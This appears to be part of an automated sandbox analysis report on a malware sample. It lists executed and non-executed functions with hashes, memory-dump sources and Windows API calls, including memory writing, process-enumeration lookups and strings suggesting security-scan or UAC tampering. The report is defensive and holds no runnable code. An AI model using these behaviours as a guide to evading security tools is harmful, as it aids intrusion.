                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$ClearCopy
                                                                                              • String ID:
                                                                                              • API String ID: 274517740-0
                                                                                              • Opcode ID: d52ad760c8a665ee56ef74411318a817dacf007b104570a69c44ffccaa254b23
                                                                                              • Instruction ID: 99b80b9a0ae7b93a5b0144f8ed16bf888a8e0cb196c78faccc650f577c93d29e
                                                                                              • Opcode Fuzzy Hash: d52ad760c8a665ee56ef74411318a817dacf007b104570a69c44ffccaa254b23
                                                                                              • Instruction Fuzzy Hash: B811C22873039087C734EF29C8C496A7BD9BFAC652B05846DE40A8F209DB30CC41C6F2
                                                                                              Function 031CE3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitVariant
                                                                                              • String ID:
                                                                                              • API String ID: 1927566239-0
                                                                                              • Opcode ID: 458e4d06f1799b5729ae68d348952cc690d90e63046cc57c07287c19de318b53
                                                                                              • Instruction ID: d8f3b065703ae1b6e1c91297f77b5bc3d5fa213078148070da31ba41650ace60
                                                                                              • Opcode Fuzzy Hash: 458e4d06f1799b5729ae68d348952cc690d90e63046cc57c07287c19de318b53
                                                                                              • Instruction Fuzzy Hash: 2F317375620288AFDB14DFA8D8889EEB7FCEB1C202F484569F904D7240D334E990CBB1
                                                                                              Function 031D89D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                                • Part of subcall function 031D7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D7DEC
                                                                                                • Part of subcall function 031D8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,031D83C2), ref: 031D83A4
                                                                                              • FreeLibrary.KERNEL32(74AE0000,00000000,00000000,00000000,00000000,0324738C,Function_0000662C,00000004,0324739C,0324738C,05F5E103,00000040,032473A0,74AE0000,00000000,00000000), ref: 031D8AAA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                              • String ID:
                                                                                              • API String ID: 1478290883-0
                                                                                              • Opcode ID: 5f4219f007b76ffe1fc2cdaf2901152bda2ddb47711e02c3178dc5c39c0f45cb
                                                                                              • Instruction ID: 7f3d6cb9e4f59de377262a07d676f40029fad709f871e39ddaaf78e152114956
                                                                                              • Opcode Fuzzy Hash: 5f4219f007b76ffe1fc2cdaf2901152bda2ddb47711e02c3178dc5c39c0f45cb
                                                                                              • Instruction Fuzzy Hash: D92193B8764344BFDB00FBB9DC12B5D7BE8DB1DA00F510464B934EF281EB74A9408618
                                                                                              Function 031D6D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CLSIDFromProgID.OLE32(00000000,?,00000000,031D6DB9,?,?,?,00000000), ref: 031D6D99
                                                                                                • Part of subcall function 031C4C60: SysFreeString.OLEAUT32(031DF4A4), ref: 031C4C6E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeFromProgString
                                                                                              • String ID:
                                                                                              • API String ID: 4225568880-0
                                                                                              • Opcode ID: 7ee9fc7feeecc88b092064665793714572e9ccefa5fa4bc7e105386b5353d974
                                                                                              • Instruction ID: bf825952499dedcdfad5313bc5414f8a5b3847b7021c297d3399ffe2a9f822d3
                                                                                              • Opcode Fuzzy Hash: 7ee9fc7feeecc88b092064665793714572e9ccefa5fa4bc7e105386b5353d974
                                                                                              • Instruction Fuzzy Hash: 51E0E5392147487FD312FB66EC61D9E77BCDB9F600B9204B4E400A7514DB316D0080A0
                                                                                              Function 031C5868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(031C0000,?,00000105), ref: 031C5886
                                                                                                • Part of subcall function 031C5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,031C0000,031EE790), ref: 031C5AE8
                                                                                                • Part of subcall function 031C5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,031C0000,031EE790), ref: 031C5B06
                                                                                                • Part of subcall function 031C5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,031C0000,031EE790), ref: 031C5B24
                                                                                                • Part of subcall function 031C5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 031C5B42
                                                                                                • Part of subcall function 031C5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,031C5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 031C5B8B
                                                                                                • Part of subcall function 031C5ACC: RegQueryValueExA.ADVAPI32(?,031C5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,031C5BD1,?,80000001), ref: 031C5BA9
                                                                                                • Part of subcall function 031C5ACC: RegCloseKey.ADVAPI32(?,031C5BD8,00000000,?,?,00000000,031C5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031C5BCB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                                                              • String ID:
                                                                                              • API String ID: 2796650324-0
                                                                                              • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                              • Instruction ID: 31d6ade9cd0247c7eaefa726517a2e78c149833541a4ee93d1948c6c5f064c4d
                                                                                              • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                              • Instruction Fuzzy Hash: 05E06D71A103149FCB10DEADC8C1A4633D8AB1D650F0809A5ED54CF246D7B1E92087D1
                                                                                              Function 031C7DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 031C7DF4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3934441357-0
                                                                                              • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                              • Instruction ID: ef2ebdf20965e583376b424c72957558cae68124c4e4ae245c01be35b278845f
                                                                                              • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                              • Instruction Fuzzy Hash: B5D05BB63192907BE224D65A5D44DA75BDCCFCA770F14067DF568C7180D7608C01C671
                                                                                              Function 031C7E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,031E041F,ScanString,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanString,03247380,031EB7B8,UacScan,03247380,031EB7B8,UacInitialize), ref: 031C7E67
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: f0603f79c985abbd9e467084389eeeab23f229ce479b25f1777e651fb4263a00
                                                                                              • Instruction ID: e95599b3583b5f712a5ea9706709662a36cc02667f1cb0fc95cbe2ec4ab7a980
                                                                                              • Opcode Fuzzy Hash: f0603f79c985abbd9e467084389eeeab23f229ce479b25f1777e651fb4263a00
                                                                                              • Instruction Fuzzy Hash: FAC08CB62353800F5E50E5BC2CC4259D389092C03436C0A29E438C62E2D76298B22810
                                                                                              Function 031C7E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,031E356F,ScanString,03247380,031EB7B8,OpenSession,03247380,031EB7B8,ScanBuffer,03247380,031EB7B8,OpenSession,03247380,031EB7B8,Initialize), ref: 031C7E8B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 3467ccafc9b080e3920a03b803a7582c061543677b4cd7e3fb3217d71785ba3f
                                                                                              • Instruction ID: 6248fd49f7cddc3140c185fcd827b6b08d96f2a3a678eaffaaf374631816b64f
                                                                                              • Opcode Fuzzy Hash: 3467ccafc9b080e3920a03b803a7582c061543677b4cd7e3fb3217d71785ba3f
                                                                                              • Instruction Fuzzy Hash: 04C08CF72353D00F5E60E5BC1CC51A9438809AC0357681E69E438CA2C1D75698322820
                                                                                              Function 031C4C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString
                                                                                              • String ID:
                                                                                              • API String ID: 3341692771-0
                                                                                              • Opcode ID: 8f59a01dc2def63d57c38a763d75440e0a15885831eefe8f9f31431ff0765006
                                                                                              • Instruction ID: 29e806f4b314be0f1ad3c434983a783eac21cec3ddde6315c40a5cc21d5d3dfe
                                                                                              • Opcode Fuzzy Hash: 8f59a01dc2def63d57c38a763d75440e0a15885831eefe8f9f31431ff0765006
                                                                                              • Instruction Fuzzy Hash: 09C012AA66427057EB22D69AACC0752A2DC9B2D294B1804A59404DB261E760DC004294
                                                                                              Function 031EC35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • timeSetEvent.WINMM(00002710,00000000,031EC350,00000000,00000001), ref: 031EC36C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Eventtime
                                                                                              • String ID:
                                                                                              • API String ID: 2982266575-0
                                                                                              • Opcode ID: da025839a00e95888db751e94552557f88ae2327607366114cf0003c7f3b0773
                                                                                              • Instruction ID: 517cbda2056ca2872ce064a9f863d6de7a659ddfb3c1a3ed25980f3e82937899
                                                                                              • Opcode Fuzzy Hash: da025839a00e95888db751e94552557f88ae2327607366114cf0003c7f3b0773
                                                                                              • Instruction Fuzzy Hash: B3C048B13A0B802BFA10A6A55CD2F32669CD31AB12F104015B608AE2C5D3A358004AA4
                                                                                              Function 031C4C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 031C4C3F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocString
                                                                                              • String ID:
                                                                                              • API String ID: 2525500382-0
                                                                                              • Opcode ID: deef39a2cc415ea7aa2211a8cf66897036e36a853147c6e932415ea0be047887
                                                                                              • Instruction ID: fd09297a04eed1de3aedb8160388f8f7dcaec2aa0ddd557c11b6833dc9e427b7
                                                                                              • Opcode Fuzzy Hash: deef39a2cc415ea7aa2211a8cf66897036e36a853147c6e932415ea0be047887
                                                                                              • Instruction Fuzzy Hash: 88B0922927C2C127EB19A2630E207B2804C0B7C582F8910689E16C80A1EF00C8024039
                                                                                              Function 031C4C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 031C4C57
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeString
                                                                                              • String ID:
                                                                                              • API String ID: 3341692771-0
                                                                                              • Opcode ID: ae581ebb92addf67a3a65b39d43af7ed10248a7cf14a7419a8a23d03648cf3b3
                                                                                              • Instruction ID: 66fa8afc497e881b050301a53e24da1ffb86475fe9f37b780138f980fad85f93
                                                                                              • Opcode Fuzzy Hash: ae581ebb92addf67a3a65b39d43af7ed10248a7cf14a7419a8a23d03648cf3b3
                                                                                              • Instruction Fuzzy Hash: 92A0129C014342178B076219002001A51212EE8100398C4AC0100090114F2584006054
                                                                                              Function 031C15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,031C1A03,?,031C2000), ref: 031C15E2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 4543178a33cbde168d9c3394c8b33df7632f3382d28edc0adb4430b1e6ccf1ae
                                                                                              • Instruction ID: 86bdf0f6991c96a65a3aa3a8ff62a1229511d45d153f5b7f4e41ab8d752a2083
                                                                                              • Opcode Fuzzy Hash: 4543178a33cbde168d9c3394c8b33df7632f3382d28edc0adb4430b1e6ccf1ae
                                                                                              • Instruction Fuzzy Hash: 7FF049F47523405FDB09EFBAAA443017AD2F78E244F24C13DD609DB389E77194028B00
                                                                                              Function 031C1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,031C2000), ref: 031C16A4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: 6d79b4f7b71920449dfeb97ae3357430f7ac8f3d972bee088be795c36a5182a4
                                                                                              • Instruction ID: 96f9da1eb98d99c070c7adc5120f3ae93cb36308028f5a3ff0f5baf6504934ec
                                                                                              • Opcode Fuzzy Hash: 6d79b4f7b71920449dfeb97ae3357430f7ac8f3d972bee088be795c36a5182a4
                                                                                              • Instruction Fuzzy Hash: 97F02EBAA407A57BD710EF4AAC80B82BB90FB19324F044139FA089B344C3B0A8008794
                                                                                              Function 031C16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 031C1704
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 1263568516-0
                                                                                              • Opcode ID: 83b0a146a2fc254230e608cfd06ffb909925fb00a56e4fc98f19c2b07c86f6f7
                                                                                              • Instruction ID: 3000d63e2d3e5df836dccdd8052526843c3ac463b8ca12f0f66c3d9e00891b3f
                                                                                              • Opcode Fuzzy Hash: 83b0a146a2fc254230e608cfd06ffb909925fb00a56e4fc98f19c2b07c86f6f7
                                                                                              • Instruction Fuzzy Hash: F0E086793503517FD7109AB95D44712ABD9EB6D550F244479F505DB242D3A0E8008760

                                                                                              Non-executed Functions

                                                                                              Function 031DAB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,031DADA3,?,?,031DAE35,00000000,031DAF11), ref: 031DAB30
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 031DAB48
                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 031DAB5A
                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 031DAB6C
                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 031DAB7E
                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 031DAB90
                                                                                              • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 031DABA2
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 031DABB4
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 031DABC6
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 031DABD8
                                                                                              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 031DABEA
                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 031DABFC
                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 031DAC0E
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 031DAC20
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 031DAC32
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 031DAC44
                                                                                              • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 031DAC56
                                                                                              Strings
                                                                                              Memory Dump Source
